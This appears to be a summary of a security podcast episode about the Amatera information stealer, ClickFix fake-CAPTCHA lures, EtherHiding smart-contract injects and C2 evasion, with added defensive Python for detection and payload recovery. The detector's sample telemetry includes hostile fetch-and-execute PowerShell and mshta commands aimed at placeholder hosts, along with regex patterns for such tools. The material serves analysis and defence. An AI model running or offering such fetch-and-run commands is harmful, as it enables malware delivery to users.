CyberWire Daily – Episode: "Click Here to Steal" [Research Saturday]
Release Date: July 12, 2025
Network: N2K Networks
Introduction
In this episode of CyberWire Daily's Research Saturday, host Dave Bittner talks with Selina Larson, threat researcher and lead for intelligence analysis and strategy at Proofpoint. The conversation centers on the evolving information-stealer landscape, in particular the emergence of Amatera Stealer as a rebrand of ACR Stealer and the techniques its operators use to evade detection.
Amatera Stealer: Evolution and Rebranding
Timestamp: [02:26]
Selina Larson introduces Amatera Stealer, an information stealer that Proofpoint assesses to be a rebranded continuation of ACR Stealer, and explains why the rebrand matters:
"The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive that we were able to see about this pretty interesting information stealer."
— Selina Larson [02:26]
Key Points:
- Code Overlap: Amatera Stealer shares substantial code with ACR Stealer, which is the basis for treating it as a direct descendant rather than a new family.
- Malware as a Service (MaaS): Amatera is sold as a subscription service, the same model Luma used while it was the dominant stealer before its disruption.
- Enhanced Features: Compared with ACR, Amatera adds stronger anti-analysis measures, more sophisticated command and control (C2), and a tiered offering for customers.
Distribution Techniques: ClearFake Campaigns and ClickFix
Timestamp: [06:08]
The discussion shifts to how Amatera Stealer is distributed: ClearFake campaigns on compromised websites, delivering the stealer through the ClickFix technique.
"ClickFix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
— Selina Larson [07:11]
ClearFake Campaigns:
- Web Injects: JavaScript injected into compromised, otherwise legitimate websites displays the lure; because the site itself is trusted, visitors have no reason to suspect the page.
- Fake CAPTCHAs: The inject presents a "verify you are human" step that instructs the user to run a command; that command fetches and executes the stealer rather than verifying anything.
ClickFix Technique:
- Social Engineering: The victim performs the execution. The page places a command on the clipboard and tells the user to paste it into a PowerShell prompt (or the Windows Run dialog) and press Enter, so no exploit, attachment or conventional download is needed and the controls built for those never fire.
- Ubiquity: Many unrelated actors now use ClickFix across email, malvertising and compromised-site campaigns, which is why Larson describes it as having "completely overtaken the landscape."
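As an added example (not code from the episode, Proofpoint or N2K), the following Python flags ClickFix-shaped process-creation events. The JSON-lines telemetry, hostnames, paths and URLs are constructed for illustration; the regexes encode the tells described above: a hidden PowerShell window, a fetch-and-run primitive, a pasted "verification" comment, and an interactive parent such as the Run dialog's explorer.exe.

```python
"""Flag ClickFix-style command lines in process-creation telemetry.

Added example for this episode summary; it is not code from Proofpoint or N2K.
The events are constructed to resemble Sysmon Event ID 1 records exported as
JSON lines; the hostnames, paths and URLs are invented for illustration.
"""
import json
import re
from dataclasses import dataclass, field

# A ClickFix paste usually combines a hidden console, a fetch-and-run
# primitive, and a trailing "verification" comment whose only purpose is to
# make the pasted text look like a CAPTCHA step to the victim.
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+h(?:idden)?\b", re.I)
DOWNLOAD = re.compile(
    r"(?:\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|\bcurl\b|\bwget\b)", re.I)
EXECUTE = re.compile(
    r"(?:\biex\b|invoke-expression|\|\s*(?:cmd|powershell|pwsh)\b|start-process)", re.I)
MSHTA_REMOTE = re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I)  # fetch+run in one
FAKE_VERIFY = re.compile(r"(?:not a robot|captcha|verification (?:id|code)|ray id)", re.I)
# The paste lands in the Run dialog or a terminal, so the parent is an
# interactive shell, not a scheduler, agent or management tool.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}


@dataclass
class Verdict:
    host: str
    command: str
    reasons: list[str] = field(default_factory=list)

    @property
    def alert(self) -> bool:
        r = set(self.reasons)
        fetch_and_run = {"download", "execute"} <= r or "mshta_remote" in r
        # Require the fetch+run chain plus one ClickFix tell; a fake
        # verification comment next to an execute primitive is enough by itself.
        return (fetch_and_run and bool(r & {"hidden", "fake_verify", "interactive"})) \
            or ({"fake_verify", "execute"} <= r)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Verdict:
    """Score one process-creation event and record which tells matched."""
    cmd = event.get("CommandLine", "")
    v = Verdict(event.get("host", "?"), cmd)
    for name, rx in (("hidden", HIDDEN_WINDOW), ("download", DOWNLOAD),
                     ("execute", EXECUTE), ("mshta_remote", MSHTA_REMOTE),
                     ("fake_verify", FAKE_VERIFY)):
        if rx.search(cmd):
            v.reasons.append(name)
    if basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        v.reasons.append("interactive")
    return v


def triage(jsonl: str) -> list[Verdict]:
    return [assess(json.loads(line)) for line in jsonl.splitlines() if line.strip()]


def alerting_hosts(jsonl: str) -> list[str]:
    return [v.host for v in triage(jsonl) if v.alert]


# Constructed sample telemetry (not real logs). Lines 1 and 2 are ClickFix
# shapes; lines 3 and 4 are routine admin and developer activity.
SAMPLE_EVENTS = r'''
{"host":"WS-014","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iex (iwr 'https://verify.example.invalid/x').Content\" # I am not a robot - reCAPTCHA Verification ID: 7811"}
{"host":"WS-022","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://cdn.example.invalid/check.hta"}
{"host":"SRV-03","ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"host":"DEV-07","ParentImage":"C:\\Program Files\\Microsoft VS Code\\Code.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell Invoke-WebRequest -Uri https://pkg.example.invalid/tool.zip -OutFile tool.zip"}
'''

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(("ALERT " if v.alert else "ok    ") + v.host, v.reasons)
```

The fourth sample shows why the rule demands a fetch-and-run chain rather than a download alone: a developer pulling an archive with Invoke-WebRequest matches the download pattern but nothing else, so it stays quiet, while the pasted ClickFix command trips four tells at once.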
Advanced Evasion Techniques: EtherHiding
Timestamp: [10:55]
Selina introduces EtherHiding, a technique used alongside ClearFake campaigns to make the inject harder to take down and to analyze.
"EtherHiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
— Selina Larson [11:02]
Mechanism:
- Smart Contracts: The script injected into the compromised site reads JavaScript stored in a smart contract on the Binance chain and runs it in the visitor's browser, where it builds the fake CAPTCHA and the command the victim is told to paste.
- Flexibility: The operators change the payload by updating the contract's stored data, so the inject on the compromised sites never needs to change, there is no conventional hosting provider to take the payload down, and reading the contract costs the visitor nothing and leaves no transaction behind.
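As an added example (not code from Proofpoint, N2K or any observed campaign), the Python below shows the retrieval step the mechanism relies on and how an analyst can recover the stored payload offline: it builds the JSON-RPC eth_call the inject would send to a chain RPC node, then ABI-decodes the string the contract returns. The contract address, function selector, RPC reply and embedded JavaScript are all placeholders constructed here; in practice you take the `to` and `data` values from the captured inject.

```python
"""Recover the JavaScript an EtherHiding inject reads from a smart contract.

Added example for this episode summary; it is not code from Proofpoint, N2K or
any observed campaign. The contract address, function selector and the
JavaScript "stored" in the contract are placeholders constructed here so the
script runs offline.
"""
import json
import re

# Placeholders (assumptions). In a real case, take `to` and `data` from the
# eth_call the injected script issues; `data` begins with the 4-byte selector,
# the first 4 bytes of keccak256("name(types)"), which is NOT hashlib.sha3_256.
CONTRACT = "0x1111111111111111111111111111111111111111"
SELECTOR = "0xdeadbeef"
URL_RX = re.compile(r"https?://[^\s'\"`<>)]+")


def build_eth_call(contract: str, calldata: str, rpc_id: int = 1) -> dict:
    """JSON-RPC body the inject sends to a public chain RPC node. Reads are free,
    need no wallet and leave no on-chain record, which is part of the appeal."""
    return {"jsonrpc": "2.0", "id": rpc_id, "method": "eth_call",
            "params": [{"to": contract, "data": calldata}, "latest"]}


def abi_encode_string(s: str) -> bytes:
    """Solidity ABI encoding of a single dynamic `string` return value:
    32-byte offset, 32-byte length, then the bytes right-padded to 32."""
    data = s.encode("utf-8")
    return ((32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
            + data + b"\x00" * (-len(data) % 32))


def abi_decode_string(hexdata: str) -> str:
    """Inverse of abi_encode_string, with bounds checks because the response
    comes from an attacker-controlled contract."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("response too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("string offset points outside the response")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared string length exceeds the response")
    return raw[start:start + length].decode("utf-8", errors="replace")


def extract_payload(rpc_response: str) -> str:
    """Pull the stored script out of an eth_call JSON-RPC reply."""
    body = json.loads(rpc_response)
    if "error" in body:
        raise RuntimeError(f"RPC error: {body['error']}")
    return abi_decode_string(body["result"])


def next_stage_urls(script: str) -> list[str]:
    """Hosts worth blocking: whatever the stored script fetches next."""
    return sorted(set(URL_RX.findall(script)))


# Constructed stand-in for what a contract might return: a short loader that
# fetches the fake-CAPTCHA page and ClickFix command from a second server.
SAMPLE_SCRIPT = ("const u='https://stage.example.invalid/v';"
                 "fetch(u).then(r=>r.text()).then(t=>showVerify(t));")
SAMPLE_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
                              "result": "0x" + abi_encode_string(SAMPLE_SCRIPT).hex()})

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    script = extract_payload(SAMPLE_RESPONSE)
    print(script)
    print(next_stage_urls(script))
```

Two practical points follow from the code. First, nothing in the contract can be taken down, so blocking has to target the public RPC endpoints the inject queries (where that is acceptable) and the next-stage URLs recovered from the decoded script. Second, the decoder validates the offset and length before slicing: the data is attacker-controlled, and a malformed reply should fail loudly rather than return a truncated script that an analyst might mistake for the real payload.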
Amatera Stealer’s Capabilities and Command & Control (C2) Infrastructure
Timestamp: [15:17]
The conversation delves into the operational aspects of Amatera Stealer, outlining its data exfiltration goals and C2 communications.
"Amatera Stealer is capable of running secondary payloads, downloading and executing executables or PowerShell commands."
— Selina Larson [15:17]
Data Targets:
- Credentials: Passwords, crypto wallets.
- Sensitive Information: Files on disks, browser cookies, web forms.
C2 Strategies:
- Stealth Communication: C2 traffic is ordinary HTTP, but the stealer builds it on NTSockets, a low-level networking implementation that talks to the Windows socket driver through NT system calls instead of the WinINet/WinHTTP/Winsock user-mode APIs that EDR hooks and sandboxes commonly instrument, so API-level telemetry does not see the connections.
- CDN Utilization: The C2 sits behind a public CDN (Cloudflare), so its IP addresses are shared with countless legitimate sites and cannot simply be blocked; detection has to key on the HTTP and TLS characteristics of the traffic instead.
- No DNS Dependency: The malware reaches the CDN edge without performing its own DNS lookup for the C2 hostname, so DNS logs, sinkholes and passive-DNS monitoring never record it; network detection must come from traffic inspection or endpoint telemetry.
Market Impact and the Decline of Luma Stealer
Timestamp: [18:13]
The discussion assesses whether Amatera Stealer is poised to fill the void left by the disrupted Luma Stealer.
"The market is now a little bit more open for some of these people who are like, okay, do I not trust Luma Stealer anymore... What we're seeing with Amatera is it's under active development."
— Selina Larson [19:48]
Insights:
- Opportunity Post-Luma Disruption: The takedown of Luma left a gap in the stealer market that Amatera Stealer is well positioned to fill.
- Active Development: Continuous updates make Amatera a credible alternative for criminals who no longer trust Luma.
- Market Dynamics: Disruptions in one service often lead to the rise of others, emphasizing the need for constant vigilance.
Defensive Recommendations for Security Teams
Timestamp: [22:37]
Selina offers strategic advice for defenders to safeguard against threats like Amatera Stealer.
"Incorporate ClickFix technique into your existing security training and restrict users from running unauthorized PowerShell."
— Selina Larson [22:44]
Key Strategies:
- Network Signatures:
  - Implement and keep updating network signatures for the stealer's C2 traffic and exfiltration, since the CDN-fronted, DNS-free C2 design leaves traffic content as the main network signal.
- User Education:
  - Add ClickFix to security awareness training: no legitimate verification step ever asks a user to paste a command into PowerShell or the Run dialog.
- Restrict PowerShell Usage:
  - Prevent ordinary users from running unauthorized PowerShell so that a pasted ClickFix command cannot execute even when the social engineering succeeds.
- Control Downloads:
  - Limit downloads from untrusted or newly registered domains.
  - Ensure software downloads are vetted and authorized by IT departments.
- Defense in Depth:
  - Layer these controls so that malicious activity is still blocked when one of them is bypassed.
Conclusion
The episode underscores the dynamic and evolving nature of the information stealer ecosystem, with Amatera Stealer exemplifying the advanced tactics employed by cybercriminals to sustain and enhance their operations. Selina Larson’s insights provide a comprehensive overview of the current threats and actionable strategies for organizations to bolster their defenses against such sophisticated malware.
Notable Quotes:
- Selina Larson [02:26]: "The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive."
- Selina Larson [07:11]: "ClickFix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
- Selina Larson [11:02]: "EtherHiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
- Selina Larson [22:44]: "Incorporate ClickFix technique into your existing security training and restrict users from running unauthorized PowerShell."
Produced by: Liz Stokes
Mixed by: Elliot Keltzman and Trey Hester
Executive Producer: Jennifer Iban
Publisher: Peter Kilpe
Host: Dave Bittner